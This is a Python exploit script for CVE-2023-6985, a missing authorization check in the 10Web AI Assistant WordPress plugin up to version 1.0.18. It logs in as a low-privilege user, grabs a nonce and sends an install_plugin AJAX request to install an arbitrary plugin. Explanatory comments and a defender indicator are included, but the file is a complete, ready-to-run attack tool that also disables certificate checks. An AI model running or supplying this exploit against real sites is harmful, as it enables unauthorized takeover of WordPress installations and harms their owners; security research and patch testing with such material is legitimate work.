#!/usr/bin/env python3
import requests
import argparse
import os
import re
#
# Exploit script by @RandomRobbieBF
#
# Proxy configuration for every HTTP(S) request made by requests in this process.
# Left empty here; an empty value is, as far as urllib's environment lookup is
# concerned, the same as having no proxy configured (hedged: verify on your
# requests/urllib version). Set it to an intercepting proxy when reviewing traffic.
http_proxy = ""
os.environ.update({'HTTP_PROXY': http_proxy, 'HTTPS_PROXY': http_proxy})
# Silence urllib3's InsecureRequestWarning. The session used below runs with
# verify=False, so certificate errors are neither enforced nor, after this, reported.
# NOTE(review): requests.packages is a legacy alias; importing urllib3 directly
# is the supported spelling if this breaks on a newer requests release — confirm.
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def remove_html_tags(text):
    """Strip anything that looks like an HTML tag from *text*.

    Removes every non-greedy ``<...>`` match. This is a display helper for
    server output, not an HTML sanitiser: entities are untouched and a tag
    containing a newline is not matched (no DOTALL).
    """
    return re.sub('<.*?>', '', text)
def login_and_activate_plugin(siteurl, wp_user, wp_pass,slug,pluginphp):
    """Log in to a WordPress site and submit one ``install_plugin`` AJAX request.

    Despite the name, nothing in this function activates a plugin: the only
    privileged request sent is ``action=install_plugin`` to
    ``/wp-admin/admin-ajax.php``, the missing-capability-check path that
    DESCRIPTION refers to. Progress is reported with ``print``.

    For defenders, that request is the indicator: a POST to admin-ajax.php
    with ``action=install_plugin`` from a session that is not an administrator.

    Args:
        siteurl: Base URL of the site. Paths are appended by plain string
            concatenation, so a trailing slash produces ``//wp-login.php``.
        wp_user: WordPress account name.
        wp_pass: Password for that account.
        slug: Plugin slug; sent as ``plugin_zip_name`` and as the directory
            part of ``plugin_file``.
        pluginphp: PHP file name joined to *slug* for ``plugin_file``.

    Returns:
        None. Calls ``exit()`` (SystemExit) when no logged-in cookie is
        present after the login POST.
    """
    # Log in
    session = requests.Session()
    session.verify = False # Ignore SSL verification
    # Certificate verification is off for every request in this session, so the
    # credentials below go out without any check on the server's identity.
    login_url = siteurl + '/wp-login.php'
    login_response = session.post(login_url, verify=False, data={
        'log': wp_user,
        'pwd': wp_pass,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    })
    # The login response's cookies are also passed explicitly to later requests,
    # although the session jar already retains them (the check below reads the jar).
    cookies = login_response.cookies
    # Confirm successful login. Success is inferred solely from a cookie whose
    # name contains 'wordpress_logged_in'; the HTTP status is not examined.
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("Logged in successfully.")
    else:
        print("Failed to log in.")
        exit()
    # Get REST API Nonce
    print('Getting REST API Nonce!')
    nonce_url = siteurl + '/wp-admin/admin-ajax.php?action=rest-nonce'
    nonce_response = session.get(nonce_url,cookies=cookies)
    # No status check: whatever body comes back is taken as the nonce.
    rest_nonce = nonce_response.text.strip()
    print("Nonce Found: "+rest_nonce+"")
    # Install Plugin
    print("Installing Plugin")
    # The nonce travels as 'ajax_nonce'; plugin_file is "<slug>/<pluginphp>".
    paramsPost = {"action":"install_plugin","plugin_zip_name":slug,"ajax_nonce":rest_nonce,"plugin_file":""+slug+"/"+pluginphp+""}
    # Referer points at the plugin's own admin page. NOTE(review): advertising
    # 'br' in Accept-Encoding relies on requests having a brotli decoder
    # available — confirm, or drop 'br'.
    headers = {"Origin":siteurl,"Accept":"text/plain, */*; q=0.01","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0","Referer":""+siteurl+"/wp-admin/admin.php?page=ai_assistant_tenweb","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate, br","Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}
    response = session.post(""+siteurl+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers, cookies=cookies)
    # Strip tags and ellipsis characters from the server's reply before printing;
    # the response status is not checked, so this prints whatever came back.
    x = remove_html_tags(response.text).replace("…","")
    print(x)
# Vulnerability summary. Despite the comment in the original, this is a
# module-level string, not a comment: it is passed to argparse as the
# --help description in the __main__ block below.
DESCRIPTION = """
10Web AI Assistant – AI content writing assistant <= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation
Description
CVE-2023-6985 - The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site."""
if __name__ == '__main__':
    # Command-line entry point: every option is mandatory. Note that --password
    # given on the command line is visible in shell history and process listings.
    cli = argparse.ArgumentParser(description=DESCRIPTION)
    for flag, text in (
        ('--url', 'URL of the WordPress site'),
        ('--username', 'WordPress username'),
        ('--password', 'WordPress password'),
        ('--slug', 'WordPress Plugin Slug'),
        ('--php', 'WordPress Plugin PHP file'),
    ):
        cli.add_argument(flag, required=True, help=text)
    opts = cli.parse_args()
    login_and_activate_plugin(opts.url, opts.username, opts.password, opts.slug, opts.php)